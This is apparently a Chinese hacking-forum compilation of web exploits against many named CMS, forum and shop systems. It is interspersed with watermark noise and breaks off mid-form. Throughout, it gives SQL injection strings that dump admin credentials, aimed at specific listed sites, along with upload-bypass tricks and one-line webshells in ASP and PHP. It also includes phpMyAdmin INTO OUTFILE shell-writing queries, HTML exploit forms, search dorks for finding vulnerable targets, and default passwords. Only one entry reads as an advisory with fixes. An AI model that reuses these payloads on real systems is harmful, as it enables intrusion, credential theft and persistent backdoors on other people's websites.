启航企业建站系统 cookie注入漏洞通杀所有版本
& V6 t: V" I2 n* f1 `
7 W& c; o" G7 h( z: ~: c1 b直接上exploit:1 V* w& q# M. g
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));3 i- B: k1 |6 d# R
test:http://www.tb11.net/system/xitong/shownews.asp?id=210( Z5 I G( @" |2 W
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ f$ @' h6 n3 l0 C0 S2 pAsprain论坛 注册用户 上传图片就可拿到webshell+ o( \; v6 d, D# Z9 T, J9 L$ t
$ u6 v3 E: }/ A: N) V2 C
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
( n: |( Y# F3 f: Y1 i7 q6 H1.txt存放你的一句话马 如:<%execute(request("cmd"))%>( ] i) |- w7 Z1 W
2.gif 为一小图片文件,一定要小,比如qq表情图片
; @* S! I* }. O. r" T% p4 [3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用 G3 {' F, f* I/ z. J
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了; w& {1 y5 X& @) U! `3 U8 t
5.q.asp;.gif- J. `4 a( ]' x
google:Powered by Asprain
; A. V+ j5 I* G$ U--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 ~5 Z) k1 L2 x% I" r; g2 `
7 q7 {; f5 O# Q; }ShopNum1全部系统存在上传漏洞。0 \7 B, \7 t8 o8 H9 W
5 @5 D) v5 N! d% Y& K; k首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
9 _# l) ~" i7 K/ E按说明 提示登录后台。。
' K+ U2 N: }6 u( J8 y; c! B! R8 E" m在后台功能页面->附件管理->附件列表$ I3 [9 J. s6 |" G4 Q$ O$ [
可以直接上传.aspx 后缀木马( X5 L# O! k) u* B. X4 K
http://demo.shopnum1.com/upload/20110720083822500.aspx
$ l) v1 v1 Q! A7 }--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. o+ s% V* g a5 W: N. ^: c6 X
. U- w+ j2 h, ^9 q' t: ?0 O' V
牛牛CMS中小企业网站管理系统 上传漏洞8 R% L Z6 ] e2 o- X
4 h$ P- o$ Z( T3 n/ R: w牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
7 E) y: r+ p9 f! E后台:admin/login.asp
U6 `9 S, O9 g6 ~* Q$ G, j, d# lewebeditor 5.5 Nday
. l7 ?) D9 \; Z" ^$ r' Xexp:7 Q6 T( e: v- m. d1 d
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
8 D3 s3 F* t4 |. T<input?type=file?name=uploadfile?size=100><br><br>?
5 ^+ Q8 i' D3 m<input?type=submit?value=upload>?
1 `' \9 K2 W- M5 w/ U- s B' E</form>
7 }" B; ? n& f% |/ e z: K* pps:先上传小马.# i0 s: v w- X* V! @5 }0 ?! h
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
- F9 `' a* G @0 b5 _( a" j" `6 \' ?3 T% f6 j( R e. S
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 a; ~6 |, S- y, t" s. [
6 c1 P( y5 S' c% N% b& B0 IYothCMS 遍历目录漏洞
J/ n* f1 M, z4 @8 k9 K
7 V- m! N( X4 C7 @* a" ^4 J5 p优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
4 r1 ]+ q* {, D! D默认后台:admin/login.asp
O( [8 d# \8 m: R' X遍历目录:
1 | V( z2 y5 h; Rewebeditor/manage/upload.asp?id=1&dir=../* J* p( f' S) a6 Y, B1 Q' d' O- r
data:$ A: E/ \ C5 V( c! W
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa$ c& [! ?4 a+ P5 `8 Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" p2 R) F4 T/ h8 ~' A V0 x
2 ~& t: }; @, C, c; w# zNet112企业建站系统 1.0
& o; r# D) I, X! D* A- `8 n
8 J6 f9 i5 f5 M! s$ G源码简介: V- {7 V7 O+ \9 A r! o! {
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。) w/ ]+ p7 D8 h( [5 ?8 ]$ F
添加管理员:4 D& N- x( E P3 W7 Z, e
http://www.0855.tv/admin/admin.asp?action=add&level=2
' o |# x r$ ]3 m; U其实加不加都不是很重要,后台文件都没怎么作验证。
+ |/ ~! v4 T4 h1 q, g1 x上传路径:
3 S1 V, f D5 k* F# d* Dhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2009 X& N$ n% ~7 H1 W% ?
http://www.0855.tv/inc/Upfile.asp?Stype=25 b! `3 B% [0 e0 T4 E3 Y4 t0 t' E) B/ |
怎么利用自己研究。# r+ I7 _- Y5 [& W8 S4 n: E1 j
遍历目录:
* V$ y& {& W1 k! K; G' phttp://www.0855.tv/admin/upfile.asp?path=../..
. {9 Y! t3 G1 t如:3 ?! k+ v$ _" q% k# N
http://www.0855.tv/admin/upfile.asp?path=../admin
9 c" }2 ^9 W) ?# `4 j; E5 Whttp://www.0855.tv/admin/upfile.asp?path=../data
% W S, H/ W+ Q- M" Q+ y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* e" M" J( h6 z, K: \
# C, F- |6 {- w易和阳光购物商城通杀 上传漏洞# n9 ~% t* ~# X7 }8 n0 k
( O. H, H5 S- k0 o& b. _
前提要求是IIS6.0+asp坏境。) ` y! _8 \7 e3 d# t* N% ~
漏洞文件Iheeo_upfile.asp
, z# `8 C" {# _* u/ b7 X" P过滤不严.直接可以iis6.0上传
) D/ e. X/ {) E把ASP木马改成0855.asp;1.gif
0 k# }' F6 ^" H, L8 x直接放到明小子上传* B, ?" E" m. X" W+ k" T; U+ h
Google搜索:inurl:product.asp?Iheeoid=- a% A6 e' i& z4 h" [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. W+ Z: o& T. z% q7 ~6 q
" x3 r5 `/ ]! U( M2 cphpmyadmin后台4种拿shell方法4 h) K8 z# l0 c5 p: t0 a
) N. ?) K9 _& t; C2 o' V' G3 [方法一:
0 B/ W, \7 H7 z) JCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
8 J+ z' q5 ~# ~! P( \' aINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');* s9 H& z5 j2 \( @6 V
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';1 V! c# E) O4 \0 d2 n0 U
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
! |% e# [! Z. T; y; t一句话连接密码:xiaoma3 H; P" j% T4 d5 w3 o: w- g+ X% m; B0 h
方法二:
$ E! B' j4 X* H3 b2 j; q/ K! Q9 ~Create TABLE xiaoma (xiaoma1 text NOT NULL);% H) r2 F, N( ?# T5 a& u
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
3 o& M0 p4 v# h3 rselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
4 _! t; @3 j5 h: I: p, [5 VDrop TABLE IF EXISTS xiaoma;- s; u: c8 X: S; t, t
方法三:
# r7 r! i: {1 k2 x" u读取文件内容: select load_file('E:/xamp/www/s.php');
N6 R5 F8 ]( S7 V写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
$ E7 p' Y7 B0 H3 e( [cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 X: E8 p9 h+ Y" L) X方法四:
* d- c. W9 z; t. S: D! a2 oselect load_file('E:/xamp/www/xiaoma.php');6 L2 N3 q6 G- @. B, ^: @; D. u9 b
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'1 m T* g1 q" V. t: h) G7 l3 o
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir: K+ j1 k. a7 F- a2 T7 o. ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. G- h9 n) d% _8 I/ ^/ Z8 [# O* ?
5 t+ o) q7 Q9 Y" \( a传信网络独立开发网站源码0day漏洞, c( {4 l* w3 W* h
5 s0 ` _% Q& q" P
后台system/login.asp
- B. R, k, n& G' D' G# d; u进了后台有个ewebeditor
( n$ y" T1 T. B2 S1 AGoogle 搜索inurl:product1.asp?tyc=
P; |, f7 G8 y2 L" d+ H编辑器漏洞默认后台ubbcode/admin_login.asp
% i% k& |$ d$ x5 Y/ B6 d( T$ f数据库ubbcode/db/ewebeditor.mdb
7 o1 h. K5 B+ m! q默认账号密码yzm 1111111 I3 }5 N% V% P# F; F
* X# n5 _6 ^$ _. u! p* \/ ]5 }
拿webshell方法
! J/ @, v$ d' _4 Z登陆后台点击“样式管理”-选择新增样式
4 V& I( r, P* `8 P4 x% R( {$ o样式名称:scriptkiddies 随便写
% g( P" W4 l$ H9 i5 k路径模式:选择绝对路径
' G1 W/ U4 K, b! v' L, P/ O0 q图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx: _3 [: K5 p- \: g
图片类型比如就是我们要上传的ASP木马格式' g# z; x$ W2 [
上传路径:/
1 _9 T) o g, o7 ?3 O图片限制:写上1000 免的上不了我们的asp木马
! p2 k9 X, p$ X上传内容不要写
. u: z3 n/ G9 e) D3 `* _# ^) e可以提交了
" X' q" Y* u _3 ]$ j9 R样式增加成功! 6 d9 Q: [5 w. N! E: J
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
$ j7 s# w2 f- K; M# O/ c按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
, x4 f7 ?0 y6 k4 @5 s+ p o网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
4 W, `: |- T+ u- j. l上ASP木马 回车 等到路径* q' t2 t& b6 D3 e
" C0 U j. h0 p2 y后台:system/login.asp2 C; N# |4 \0 I- {9 F; i1 `
Exp:' N4 K k/ w) w( D- a; f& \( K
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master- H, T% h8 \- v8 K
测试:
1 f* k: d$ N$ }http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
; N g7 u0 _8 t: w: d% ^1 Phttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
3 g/ D& `; Z+ c ?--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 R: X6 c" H ]( i1 Z% ~. O& W- a: H
foosun 0day 最新注入漏洞
3 k3 C& L" Y; d7 y' a S7 `
* A& X, Z$ y* E2 M/ K2 h( _漏洞文件:www.xxx.com/user/SetNextOptions.asp
0 l5 k* d7 Y+ o- r' O利用简单的方法:
6 K! ~3 @- p' M* x7 Z, G暴管理员帐号:
a5 ]6 G& X. qhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
8 f" S/ s+ v+ V$ l) Y% Q' w9 ?暴管理员密码:% s$ W( ~. _7 }% B$ \/ t
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,: Z. l$ ~- X1 H+ O
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ R! g0 G; K8 O6 ?& R! u/ A
6 n3 Q ~* Q1 h5 p; k) p0 u6 y4 u网站程序的版权未知! Z; V3 P5 w4 n/ r1 ~
( P5 y+ Y1 P% b7 Y" M0 V' j2 ]默认网站数据库:
2 p, Q2 u/ T4 P! I, Zwww.i0day.com/data/nxnews.mdb
, U; m* q7 S& C" @% b5 h5 Zewebeditor 在线编辑器:- k0 h2 d& ~! u; U1 J2 ^
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
9 H9 y; k- ^+ f登录地址:ewebeditor/admin_login.asp, k1 ]8 O. F8 b# m# ?/ v+ Y
默认密码:admin admin) h9 l7 W1 s/ d g
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
, J8 F. P! P9 B8 D$ k9 b2 L1 h" Y3 i2 G& h& F. |* U1 U+ Y/ h3 b. j
Sql注入漏洞:! k! w' i) W: {3 f
http://www.i0day.com/detail.asp?id=12
* Z3 j1 A. N% I8 C/ {6 ?exp:& `# z$ R* w% \+ H
union select 1,admin,password,4,5,6,7,8 from admin
- D' Z2 v7 K; ^+ x d爆出明文帐号/密码
8 Z' C0 _& H: e* f) T
4 n! o# L) h' r6 [上传漏洞:! v- n/ {* U1 R: t
后台+upfile.asp* v" |5 A! f9 ~3 U; V
如:$ C* m6 ~9 H5 {8 m
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。7 @. i+ Q/ Y0 `: b% ]) f
shell的地址:网址+后台+成功上传的马3 s2 z- Q" A- I! i" z) V
google:inurl:news.asp?lanmuName=
( C- K/ s" S- v8 t3 y* Z' k7 [7 ^------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 _4 Y4 f. k: I* ^* v1 _8 E6 `% X! s# c& k6 y8 X6 g
dedecms最新0day利用不进后台直接拿WEBSHELL
4 w }# k3 g2 c6 `, _- g/ A" C" A x! A+ P+ O" w( _) @) Y1 X2 t2 g. t( y) g
拿webshell的方法如下:$ ]5 u& R7 Z4 u( Z$ l; t8 W4 }- k: s
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
/ ?4 B+ v2 Y/ w8 I前题条件,必须准备好自己的dede数据库,然后插入数据:+ b7 u2 M0 l; X: F9 i8 G
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
$ Z2 `5 F# y" e' M- c
0 V( Z* p1 _: s$ |; }5 F再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。4 w# a2 a# Z5 M% ]
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
# o) ]0 P5 }1 \% Z, b' g& l6 M<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
& K" i' D/ m+ [2 o0 v<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /># t& x* K5 a7 d7 m# w4 E
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
C) S9 l* z3 O/ Z<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
( J |8 I, W1 L<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />3 ~4 E% ?; `, Z! e5 q
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />0 Z B3 u# }* i( O
<input type="text" value="true" name="nocache" style="width:400">2 B+ Q( |6 |9 ?2 U# I9 [7 X8 K
<input type="submit" value="提交" name="QuickSearchBtn"><br />0 }+ L( K, ?* E* W" z
</form>9 [4 h# y' @9 M) @8 V
<script>5 `! Z, I% Z4 y3 A# K9 P
function addaction()+ g1 ?/ D$ U T
{
. a: i5 _3 L7 A+ X1 f& Idocument.QuickSearch.action=document.QuickSearch.doaction.value;! I# f6 U4 r# o% z
}
, X Q; i* [4 i( l4 B</script>0 @6 P' d+ q: C" p
-----------------------------------------------------------------------------------------------------------------------------------------------
6 d5 r# g$ _' V% z" W
8 k! n; g, [/ D! B0 e. Z( r* u* ^+ Rdedecms织梦暴最新严重0day漏洞
6 c c' `8 H# ~bug被利用步骤如下:
5 @% Z+ e1 w+ z N, L, hhttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root4 L( c1 ~/ P0 p* e
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
" H" K' |( ~9 m3 B2 J% X- ]; ^-------------------------------------------------------------------------------------------------------------------------------------------
# v2 Q' f8 h, Y* d% m
' x4 |: x2 H; r; U# b7 u# ^多多淘宝客程序上传漏洞 1 G. Q8 i2 e# {9 A1 s
漏洞页面:
+ N0 z- r9 [3 Y( Oadmin\upload_pic.php
+ j ^- e' Q+ q r E9 }& i4 ?传送门:
R* V3 o% ]' x( S0 ^* q$ thttp://www.www.com/admin/upload_pic.php?uploadtext=slide1& d, ]# J( G* y/ X. w
PS:copy张图片马 直接 xxx.php 上传抓包地址!) Z4 w2 A8 O$ H& q. U
------------------------------------------------------------------------------------------------------------------------------------------------------; I m" V7 _" d# D8 L7 R
7 ]6 B) r j8 h0 h* t* J) ~8 z无忧公司系统ASP专业版后台上传漏洞$ i+ T1 ^- p7 F; s7 X5 `
漏洞文件 后台上传
4 N1 @4 I* I; _admin/uploadPic.asp# g/ o* _' S; g @$ M) v/ e# ]
漏洞利用 这个漏洞好像是雷池的
0 Z R3 r$ E3 ehttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=13 c! j. G, n6 M9 {* X
等到的webshell路径:- p3 e5 ~, N5 E$ z" \% x
/UploadFiles/scriptkiddies.asp;_2.gif2 @6 y5 \- ^1 G, C/ `& C% Q+ Q
---------------------------------------------------------------------------------------------------------------------------------------------------
" k" a& k5 A0 f9 l) _# S) z0 U( s2 R, A8 |9 q, J
住哪酒店分销联盟系统20102 C" G. c+ L6 @
Search:8 w' ~, n# o% Q5 g4 I; K/ n
inurl:index.php?m=hotelinfo
* S+ P. U( k' khttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
7 _ T0 @. l3 a s* H默认后台:index.php?m=admin/login
& X3 n* f$ L" D--------------------------------------------------------------------------------------------------------------------------------------------------
/ p# J% L8 T5 V1 B1 I" b) [2 r+ k4 E5 `
inurl:info_Print.asp?ArticleID=- w) w' }* G6 F X/ L( Z
后台 ad_login.asp: q8 G+ F, Y7 N3 q: i6 h/ s: I
爆管理员密码:
4 {* Z) T" L0 {2 ~union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin* r2 g5 m+ z5 s+ C& I. W
------------------------------------------------------------------------------------------------------------------------------------------------------------
. T1 c* L" Y# s2 i
9 i1 K5 S, u( W$ x& E搜索框漏洞!
6 O- I) D' ^5 d! i4 c%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=': a* {+ E! }* F
--------------------------------------------------------------------------------------------------------------------------------------------------------
) J( {6 N- F z Y, N
' j ]# u" T) x6 `% m% h关键字:
# e8 J$ j, A* N- K% E6 }4 j- {inurl:/reg_TemletSel.asp?step=2
- \& r* c, D* i' `! O. p或者) j$ @; _" Q- b* Y7 C
电子商务自助建站--您理想的助手
* J* H- l4 E: F; \3 m-------------------------------------------------------------------------------------------------------------------------------------------------
z$ V- _7 ~/ M
: R- K# }) s) {iGiveTest 2.1.0注入漏洞
: P; o# s+ p& FVersion: <= 2.1.0
3 R' n2 r( _6 K" \* C) B# Homepage: http://iGiveTest.com/: u. j0 E" ~3 R2 \- Q
谷歌关键字: “Powered by iGiveTest”: b( w: u0 ^- t7 r3 G, b7 S
随便注册一个帐号。然后暴管理员帐号和密码9 z8 f! E! d' o
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
+ m3 g- t, e; P: j------------------------------------------------------------------------------------------------------------------------------------------------0 J8 K9 t/ B7 G0 l& y) B
/ ~1 T7 B3 y% R" m3 D2 {CKXP网上书店注入漏洞
9 k/ r1 v! {& B# r# d. [工具加表:shop_admin 加字段:admin1 B5 a& S5 w) L5 |7 P
后台:admin/login.asp
) g+ @2 _- ^+ U/ j' I6 B登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/- v, t1 K" s% `3 U z R) s
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ S+ H1 x" S- u; t. g--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 c2 V3 A* d' ^0 ~. M
$ B& i" b* e( Z
段富超个人网站系统留言本写马漏洞, N c8 W9 w V- b% X9 N/ g$ Y
源码下载:http://www.mycodes.net/24/2149.htm
( m: L0 @& ^$ y# O$ c+ X; H* Kaddgbook.asp 提交一句话。
9 z* b: f$ z: I2 ?; F连接: http://www.xxxx.tv/date/date3f.asp3 A0 t' A( q& V) l: ]' |# H- }% u
google:为防批量,特略!
' n( z: F# n) J- T \-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 B8 x' {& b+ s/ j, `) a: _/ i& a; w" r/ J8 P' z4 G A$ p
智有道专业旅游系统v1.0 注入及列目录漏洞
) o! c9 a2 R) t1 j7 y( Z默认后台路径:/admin/login.asp
: C7 l3 Z- N+ E1 P T( g& e默认管理员:admin& Q# C' i# \4 y2 k9 A( h+ |
默认密码:123456- o7 v, l# ]" ~4 ~+ O2 F
SQL EXP Tset:) r0 @" J7 {% T
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
3 T& L/ u8 S I------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% f9 C7 K+ \! F( s& \) }$ v: y$ J; Z& j7 q
ewebeditor(PHP) Ver 3.8 本任意文件上传0day4 y4 `! I' S, X9 I. {
EXP:
3 ]" P+ t( Y4 M" P<title>eWebeditoR3.8 for php任意文件上EXP</title>% q! _; r5 Y( `) d1 B* A' |$ B
<form action="" method=post enctype="multip
7 z: Z# I+ E$ q, D7 ~ C0 e. @art/form-data"> ! ~9 c, m4 |5 ]/ l! x, O
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
8 ^, p* L$ F# r, v& g0 W) l9 TURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> + {5 y( U$ n- P
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
/ p* c$ y$ x3 K3 a# Dfile:<input type=file name="uploadfile"><br>
7 L1 r# C' H; U; i# O' T<input type=button value=submit onclick=fsubmit()>
3 W% a R& `0 z9 B) e" b</form><br> 7 J, g9 ]" W( E! ^7 ]7 p* Q2 T& j/ q, T
<script> + H; R4 ^5 ?& {0 k# h
function fsubmit(){
3 q/ D. S9 J9 S2 i7 h! d, J& Hform = document.forms[0]; ( F: Z: c' r$ m, h& ]: o
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
: M1 ~% s0 n; L2 ^alert(form.action); % o; O2 i6 S! I t5 z
form.submit(); ! M$ f4 ?1 [, g8 Z
} 4 L" [+ L6 p" [* d+ K! R, x
</script>% `# V$ A" ?9 S+ X( ^
注意修改里面ewebeditor的名称还有路径。
% X& {. _ h4 b) a8 q: O---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" ^! R Q5 X3 r/ \5 n! ~5 r1 g$ e+ o d8 y
提交’时提示ip被记录 防注入系统的利用- r& W9 ~- I) J M" H
网址:http://www.xxx.com/newslist.asp?id=122′( C* T# }: \, E# d* A
提示“你的操作已被记录!”等信息。
( G2 s0 w1 y8 F1 e- C. R利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。& j1 M1 {/ L1 l1 C6 G8 |# [$ Y
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 [' y" ?* ?, E, K- m
' R v$ c! n0 _西部商务网站管理系统 批量拿shell-0day
* f# G& N F4 J. e% R x这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb . [. U* W$ k8 T/ g( u2 t/ r
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
' }, | z+ M: F2 b2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合# z7 `4 n4 p7 [: j7 K7 i8 l( W
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂) G1 R8 q3 I& E
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 m7 p) W: k, u7 V8 T. n$ E% z, e- r/ M( T! H) t* g! `+ J
JspRun!6.0 论坛管理后台注入漏洞
1 N- L& k% M6 I8 @7 H9 j
; }0 d3 c' {* ]) f# d& h, GSEBUG-ID:20787 发布时间:2011-04-30 影响版本:6 t9 ~4 Y5 |5 D! e- X
JspRun!6.0 , G& f. y) k) y
漏洞描述:
1 k5 b. O, b% v! j! I3 sJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
1 O! {+ n% l7 z( g7 @: Z* E在处理后台提交的文件中ForumManageAction.java第1940行- y- X& a- D& h! y! |- \: Q9 |5 S, B# P
String export = request.getParameter("export");//直接获取,没有安全过滤7 \/ L; l P* p6 I" R$ t- _- }. J
if(export!=null){
# D) o0 j( N) w7 M5 o0 W1 PList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...0 Z0 V+ R% ^& S0 v# V
if(styles==null||styles.size()==0){
5 n# Y F7 v u<*参考
+ @( j# t$ V: m; Ynuanfan@gmail.com
" u. v2 H* G- b' A6 x% k*> SEBUG安全建议:( |5 c6 D3 ]/ E' C
www.jsprun.net7 Y- ~* j# ?5 p7 N0 c
(1)安全过滤变量export
( q* }7 t2 E8 E(2)在查询语句中使用占位符* X2 \! h" K2 ~; T4 p! e8 G
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 _; H, A- R: w
* t% a6 Q- i T0 A: l2 l4 x i3 N乌邦图企业网站系统 cookies 注入
6 R$ Z# t# K* V& ~! Y# \; R- m8 O" T5 ~+ t; D
程序完整登陆后台:/admin/login.asp" B" C C1 J/ Y5 V0 _
默认登陆帐号:admin 密码:admin888
# O) N5 L$ ~1 |7 Z语句:(前面加个空格)/ V% y: p" ~# v5 \9 @" y" u
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
9 Y4 G3 q; F7 `' x5 j4 [$ y或者是16个字段:- }$ E& O% i) F8 c1 b" Z: O0 ]' R
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin- P8 Z9 q8 l4 W: S3 t K' \8 _
爆不出来自己猜字段。0 r+ z5 G0 r; ]) M( f
注入点:http://www.untnt.com/shownews.asp?=88
V' K4 M4 u$ t8 [0 ggetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
3 @. `- v8 m& |关键字:! N7 E: f' ]3 Q/ n& z
inurl:shownews?asp.id=+ q: H6 k# g% e
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 h) F( I* W5 z( }: L5 y+ ~
8 j3 p7 [3 M$ B1 K# P8 X/ N' OCKXP网上书店注入漏洞; I9 s6 ]3 `4 A+ G! Q% z
+ \& |1 @4 C P% h; n0 g0 a工具加表:shop_admin 加字段:admin4 K' Z O% c4 o
后台:admin/login.asp ; r$ e! W4 Q2 g" O: X3 K; B* _
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
F. u, E3 o1 K1 G5 h7 G3 B- ?5 Vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
8 J9 f8 D! b8 S. @---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. G! I, h" Y5 X. {- R5 j8 i5 {) h
- j( M: E+ `, ^4 o" i* K3 cYxShop易想购物商城4.7.1版本任意文件上传漏洞
* N! d1 h; `; S: g: u9 z* _
1 M4 T: C! N8 o; Y& Zhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx K2 }3 U6 x Z
跳转到网站根目录上传任意文件。
7 w3 `( z0 l2 T" R如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
- e( i, ~1 v2 ~8 H; c" ^<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
